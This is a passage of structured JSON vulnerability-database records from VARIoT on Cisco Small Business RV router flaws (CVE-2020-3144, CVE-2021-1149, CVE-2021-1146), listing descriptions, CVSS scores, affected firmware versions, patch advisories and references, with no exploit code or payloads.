          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3144"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-07-16T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-3144"
          },
          {
            "date": "2020-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "date": "2020-07-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          },
          {
            "date": "2020-07-16T18:15:16.487000",
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-07-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-3144"
          },
          {
            "date": "2020-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "date": "2020-09-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          },
          {
            "date": "2024-11-21T05:30:25.007000",
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco RV Authentication vulnerabilities in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0791

    Vulnerability from variot - Updated: 2024-11-23 21:51

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0791",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "cve": "CVE-2021-1149",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-1149",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2021-41151",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-374203",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-1149",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1149",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1149",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1149",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1149",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41151",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1030",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374203",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374203"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374203"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1149",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0143",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374203",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374203"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "id": "VAR-202101-0791",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374203"
          }
        ],
        "trust": 1.4114631585714283
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:51:05.655000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-command-inject-LBdQ2KRN",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W command injection vulnerability (CNVD-2021-41151)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272261"
          },
          {
            "title": "Multiple Cisco Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139529"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374203"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-command-inject-lbdq2krn"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1149"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0143/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374203"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374203"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374203"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          },
          {
            "date": "2021-01-13T22:15:15.083000",
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41151"
          },
          {
            "date": "2022-08-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374203"
          },
          {
            "date": "2021-09-29T07:23:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          },
          {
            "date": "2024-11-21T05:43:41.807000",
            "db": "NVD",
            "id": "CVE-2021-1149"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Command injection vulnerability in router",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002736"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1030"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0788

    Vulnerability from variot - Updated: 2024-11-23 21:51

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0788",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "cve": "CVE-2021-1146",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-1146",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2021-41154",
